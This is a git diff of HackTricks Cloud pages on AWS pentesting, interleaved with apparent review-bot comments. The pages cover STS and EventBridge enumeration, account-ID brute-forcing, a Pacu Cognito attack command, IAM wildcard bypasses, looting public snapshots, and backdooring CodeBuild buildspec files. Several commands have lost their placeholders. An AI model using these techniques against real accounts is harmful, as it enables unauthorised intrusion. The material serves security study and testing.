+ "Principal": {
+ "AWS": "arn:aws:iam:::root"
+ },
+ "Action": "sts:AssumeRole",
+ "Condition": {}
+ }
+ ]
+}
+```
+
+The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**.
+
+If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN).
+
+### Enumeration
+
+```bash
+# Get basic info of the creds
+aws sts get-caller-identity
+aws sts get-access-key-info --access-key-id
+
+# Get CLI a session token with current creds
+## Using CLI creds
+## You cannot get session creds using session creds
+aws sts get-session-token
+## MFA
+aws sts get-session-token --serial-number --token-code
+```
+
+### Privesc
+
+In the following page you can check how to **abuse STS permissions to escalate privileges**:
+
+{{#ref}}
+../aws-privilege-escalation/aws-sts-privesc.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-sts-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../aws-persistence/aws-sts-persistence.md
+{{#endref}}
+
+## References
+
+- [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
new file mode 100644
index 000000000..3be49d173
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md 
@@ -0,0 +1,81 @@
+# AWS - EventBridge Scheduler Enum
+
+## EventBridge Scheduler
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## EventBridge Scheduler
+
+**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
+
+There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed."
+
+### Types of Schedules
+
+Types of Schedules in EventBridge Scheduler:
+
+1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC.
+2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours.
+3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM.
+
+Two Mechanisms for Handling Failed Events:
+
+1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure.
+2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target.
+
+### Targets
+
+There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API.
+
+**Templated targets** support the following services:
+
+- CodeBuild – StartBuild
+- CodePipeline – StartPipelineExecution
+- Amazon ECS – RunTask
+ - Parameters: EcsParameters
+- EventBridge – PutEvents
+ - Parameters: EventBridgeParameters
+- Amazon Inspector – StartAssessmentRun
+- Kinesis – PutRecord
+ - Parameters: KinesisParameters
+- Firehose – PutRecord
+- Lambda – Invoke
+- SageMaker – StartPipelineExecution
+ - Parameters: SageMakerPipelineParameters
+- Amazon SNS – Publish
+- Amazon SQS – SendMessage
+ - Parameters: SqsParameters
+- Step Functions – StartExecution
+
+### Enumeration
+
+```bash
+# List all EventBridge Scheduler schedules
+aws scheduler list-schedules
+
+# List all EventBridge Scheduler schedule groups
+aws scheduler list-schedule-groups
+
+# Describe a specific schedule to retrieve more details
+aws scheduler get-schedule --name
+
+# Describe a specific schedule group
+aws scheduler get-schedule-group --name
+
+# List tags for a specific schedule (helpful in identifying any custom tags or permissions)
+aws scheduler list-tags-for-resource --resource-arn
+```
+
+### Privesc
+
+In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**:
+
+{{#ref}}
+../aws-privilege-escalation/eventbridgescheduler-privesc.md
+{{#endref}}
+
+## References
+
+- [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
new file mode 100644
index 000000000..37df66613
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
@@ -0,0 +1,54 @@ +# AWS - Unauthenticated Enum & Access + +{{#include ../../../banners/hacktricks-training.md}} + +## AWS Credentials Leaks + +A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\ +Some useful **tools**: + +- [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos) +- [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos) +- [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks) + +## AWS Unauthenticated Enum & Access + +There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. 
Check here how: + +- [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md) +- [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md) +- [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md) +- [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md) +- [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md) +- [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md) +- [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md) +- [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md) +- [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md) +- [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md) +- [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md) +- [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md) +- [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md) +- [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md) +- [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md) +- [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md) +- [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md) + +## Cross Account Attacks + +In the talk [**Breaking the Isolation: Cross-Account AWS Vulnerabilities**](https://www.youtube.com/watch?v=JfEFIcpJ2wk) it's presented how some services allow(ed) any AWS account accessing them because **AWS services without specifying accounts ID** were allowed. 
+ +During the talk they specify several examples, such as S3 buckets **allowing cloudtrai**l (of **any AWS** account) to **write to them**: + +![](<../../../images/image (260).png>) + +Other services found vulnerable: + +- AWS Config +- Serverless repository + +## Tools + +- [**cloud_enum**](https://github.com/initstring/cloud_enum): Multi-cloud OSINT tool. **Find public resources** in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md new file mode 100644 index 000000000..98621c498 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md 
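Review bot: The Cloud9 and Cloudsearch entries in the new service index link to `.../aws-unauthenticated-enum-access/broken-reference/README.md` on GitHub, a path that does not appear among the files added in the visible part of this diff, so both links will 404; either point them at real pages or drop them until those pages exist. The index also leaves out several pages this same diff creates (`aws-api-gateway-unauthenticated-enum.md`, `aws-codebuild-unauthenticated-access.md`, `aws-dynamodb-unauthenticated-access.md`, `aws-ecr-unauthenticated-enum.md`, `aws-ecs-unauthenticated-enum.md`, `aws-elastic-beanstalk-unauthenticated-enum.md`), which makes them unreachable from this README; one bullet per page in the same style, e.g. `- [**API Gateway Unauthenticated Enum**](aws-api-gateway-unauthenticated-enum.md)`, fixes that.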
@@ -0,0 +1,45 @@
+# AWS - Accounts Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Account IDs
+
+If you have a target there are ways to try to identify account IDs of accounts related to the target.
+
+### Brute-Force
+
+You create a list of potential account IDs and aliases and check them
+
+```bash
+# Check if an account ID exists
+curl -v https://.signin.aws.amazon.com
+## If response is 404 it doesn't, if 200, it exists
+## It also works from account aliases
+curl -v https://vodafone-uk2.signin.aws.amazon.com
+```
+
+You can [automate this process with this tool](https://github.com/dagrz/aws_pwn/blob/master/reconnaissance/validate_accounts.py).
+
+### OSINT
+
+Look for urls that contains `.signin.aws.amazon.com` with an **alias related to the organization**.
+
+### Marketplace
+
+If a vendor has **instances in the marketplace,** you can get the owner id (account id) of the AWS account he used.
+
+### Snapshots
+
+- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
+- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
+- Public AMIs (EC2 -> AMIs -> Public images)
+
+### Errors
+
+Many AWS error messages (even access denied) will give that information.
+
+## References
+
+- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
new file mode 100644
index 000000000..310015617
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md
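Review bot: The brute-force probe `curl -v https://.signin.aws.amazon.com` has no host label in front of `.signin.aws.amazon.com`, so as written it is not a usable command; an angle-bracketed placeholder was probably lost in the conversion (the same pattern shows up in other new pages of this diff), and it should read `curl -v https://<account_id_or_alias>.signin.aws.amazon.com`. The comment above it promises a clean 200 vs 404 split; since the sign-in endpoint may answer a valid alias with a redirect rather than a 200, the note is safer phrased as "404 means it does not exist, anything else means it does" and confirmed against a known account before relying on the automation linked below.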
@@ -0,0 +1,56 @@ +# AWS - API Gateway Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### API Invoke bypass + +According to the talk [Attack Vectors for APIs Using AWS API Gateway Lambda Authorizers - Alexandre & Leonardo](https://www.youtube.com/watch?v=bsPKk7WDOnE), Lambda Authorizers can be configured **using IAM syntax** to give permissions to invoke API endpoints. This is taken [**from the docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html): + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Permission", + "Action": ["execute-api:Execution-operation"], + "Resource": [ + "arn:aws:execute-api:region:account-id:api-id/stage/METHOD_HTTP_VERB/Resource-path" + ] + } + ] +} +``` + +The problem with this way to give permissions to invoke endpoints is that the **"\*" implies "anything"** and there is **no more regex syntax supported**. + +Some examples: + +- A rule such as `arn:aws:execute-apis:sa-east-1:accid:api-id/prod/*/dashboard/*` in order to give each user access to `/dashboard/user/{username}` will give them access to other routes such as `/admin/dashboard/createAdmin` for example. + +> [!WARNING] +> Note that **"\*" doesn't stop expanding with slashes**, therefore, if you use "\*" in api-id for example, it could also indicate "any stage" or "any method" as long as the final regex is still valid.\ +> So `arn:aws:execute-apis:sa-east-1:accid:*/prod/GET/dashboard/*`\ +> Can validate a post request to test stage to the path `/prod/GET/dashboard/admin` for example. + +You should always have clear what you want to allow to access and then check if other scenarios are possible with the permissions granted. 
+ +For more info, apart of the [**docs**](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-control-access-using-iam-policies-to-invoke-api.html), you can find code to implement authorizers in [**this official aws github**](https://github.com/awslabs/aws-apigateway-lambda-authorizer-blueprints/tree/master/blueprints). + +### IAM Policy Injection + +In the same [**talk** ](https://www.youtube.com/watch?v=bsPKk7WDOnE)it's exposed the fact that if the code is using **user input** to **generate the IAM policies**, wildcards (and others such as "." or specific strings) can be included in there with the goal of **bypassing restrictions**. + +### Public URL template + +``` +https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} +``` + +### Get Account ID from public API Gateway URL + +Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ +This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). + +You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md new file mode 100644 index 000000000..fc68629f1 --- /dev/null 
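Review bot: Both worked ARN examples use the service prefix `execute-apis` (`arn:aws:execute-apis:sa-east-1:accid:...`), while the docs excerpt quoted just above them uses `execute-api`, which is the real prefix; a reader who copies the example into an authorizer gets a Resource that matches nothing, which hides the over-broad wildcard the section is warning about. Change both to `arn:aws:execute-api:sa-east-1:accid:api-id/prod/*/dashboard/*` and `arn:aws:execute-api:sa-east-1:accid:*/prod/GET/dashboard/*`. The fenced `json` block still carries the docs' placeholders (`"Effect": "Permission"`, `execute-api:Execution-operation`); a one-line note that Effect must be `Allow` or `Deny` and the invoke action is `execute-api:Invoke` would stop the snippet from being pasted verbatim.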
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
@@ -0,0 +1,11 @@
+# AWS - Cloudfront Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### Public URL template
+
+```
+https://{random_id}.cloudfront.net
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
new file mode 100644
index 000000000..9dc5feb14
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
@@ -0,0 +1,35 @@
+# AWS - CodeBuild Unauthenticated Access
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## CodeBuild
+
+For more info check this page:
+
+{{#ref}}
+../aws-services/aws-codebuild-enum.md
+{{#endref}}
+
+### buildspec.yml
+
+If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**.
+
+Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example.
+
+For some related information you could check the page about how to attack Github Actions (similar to this):
+
+{{#ref}}
+../../../pentesting-ci-cd/github-security/abusing-github-actions/
+{{#endref}}
+
+## Self-hosted GitHub Actions runners in AWS CodeBuild
+
+As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this:
+
+```bash
+runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }}
+```
+
+This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached.
+
+{{#include ../../../banners/hacktricks-training.md}}
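Review bot: The runner label `runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }}` has nothing between the two dashes; the form the linked AWS page documents is `codebuild-<project-name>-${{ github.run_id }}-${{ github.run_attempt }}`, so the project-name placeholder was most likely stripped in conversion and should be restored, otherwise the detection hint does not match any real workflow. The fence is tagged `bash` but the content is a GitHub workflow YAML key, so `yaml` is the right tag. Since the section's point is that workflow code executes under the CodeBuild project's IAM role, it is worth adding one sentence that the label is the whole trust boundary: anyone who can change a workflow in that repository, or trigger one, depending on how the project's webhook filters are set, inherits that role.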
diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md similarity index 51% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md index 26a18d922..0a788f6e8 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md @@ -1,19 +1,6 @@ # AWS - Cognito Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Unauthenticated Cognito @@ -21,9 +8,9 @@ Cognito is an AWS service that enable developers to **grant their app users acce For basic info about Cognito check: -{% content-ref url="../aws-services/aws-cognito-enum/" %} -[aws-cognito-enum](../aws-services/aws-cognito-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-cognito-enum/ +{{#endref}} ### Identity Pool ID @@ -47,8 +34,8 @@ For a description of the modules' functions see part 2 of the [blog post](https: Sample `cognito__attack` usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: ```bash -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` @@ -58,17 +45,4 @@ Sample cognito\_\_enum usage to gather all user pools, user pool clients, identi Pacu (new:test) > run cognito__enum ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
new file mode 100644
index 000000000..de97c7405
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md
@@ -0,0 +1,11 @@
+# AWS - DocumentDB Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+### Public URL template
+
+```
+.cluster-..docdb.amazonaws.com
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
new file mode 100644
index 000000000..6e340d59e
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md
@@ -0,0 +1,15 @@
+# AWS - DynamoDB Unauthenticated Access
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dynamo DB
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-dynamodb-enum.md
+{{#endref}}
+
+Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
new file mode 100644
index 000000000..280a7c27b
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md
@@ -0,0 +1,60 @@ +# AWS - EC2 Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## EC2 & Related Services + +Check in this page more information about this: + +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} + +### Public Ports + +It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. + +#### SSRF + +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} + +### Public AMIs & EBS Snapshots + +AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: + +```bash +# Public AMIs +aws ec2 describe-images --executable-users all + +## Search AMI by ownerID +aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]' + +## Search AMI by substr ("shared" in the example) +aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]' + +# Public EBS snapshots (hard-drive copies) +aws ec2 describe-snapshots --restorable-by-user-ids all +aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' +``` + +If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. 
+
+#### Public URL template
+
+```bash
+# EC2
+ec2-{ip-seperated}.compute-1.amazonaws.com
+# ELB
+http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
+https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
+```
+
+### Enumerate EC2 instances with public IP
+
+```bash
+aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
new file mode 100644
index 000000000..a36e4b72b
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md
@@ -0,0 +1,34 @@
+# AWS - ECR Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## ECR
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-ecr-enum.md
+{{#endref}}
+
+### Public registry repositories (images)
+
+As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image.
+
+```bash
+aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text
+```
+
+> [!WARNING]
+> This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo.
+
+### Enumerate Private Repo
+
+The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry.
+
+```bash
+# Get image names
+skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+'
+crane ls | sed 's/ .*//'
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
new file mode 100644
index 000000000..4a2d961f5
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md
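Review bot: The enumeration command filters `describe-repositories` output on a `repositoryUriPublic` attribute that the private-ECR API does not return (its repository objects carry `repositoryArn`, `registryId`, `repositoryName`, `repositoryUri` and a few config fields), so the filter always yields an empty list. Public repositories belong to the separate ECR Public service, so the working equivalent is `aws ecr-public describe-repositories --region us-east-1 --query 'repositories[].repositoryUri' --output text`. Separately, `public.ecr.aws//`, `skopeo list-tags docker://` and `crane ls` have lost their `<registry_alias>/<repository>` argument, presumably stripped placeholders, and both tools list the tags of one named repository rather than the repositories of a registry, so the sentence introducing them overstates what they enumerate.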
@@ -0,0 +1,25 @@
+# AWS - ECS Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## ECS
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-ecs-enum.md
+{{#endref}}
+
+### Publicly Accessible Security Group or Load Balancer for ECS Services
+
+A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks.
+
+```bash
+# Example of detecting misconfigured security group for ECS services
+aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]'
+
+# Example of detecting a publicly accessible load balancer for ECS services
+aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]'
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
new file mode 100644
index 000000000..bd570128c
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md
@@ -0,0 +1,37 @@
+# AWS - Elastic Beanstalk Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Elastic Beanstalk
+
+For more information check:
+
+{{#ref}}
+../aws-services/aws-elastic-beanstalk-enum.md
+{{#endref}}
+
+### Web vulnerability
+
+Note that by default Beanstalk environments have the **Metadatav1 disabled**.
+
+The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`**
+
+### Insecure Security Group Rules
+
+Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**.
+
+### Publicly Accessible Load Balancer
+
+If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments.
+
+### Publicly Accessible S3 Buckets
+
+Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**.
+
+### Enumerate Public Environments
+
+```bash
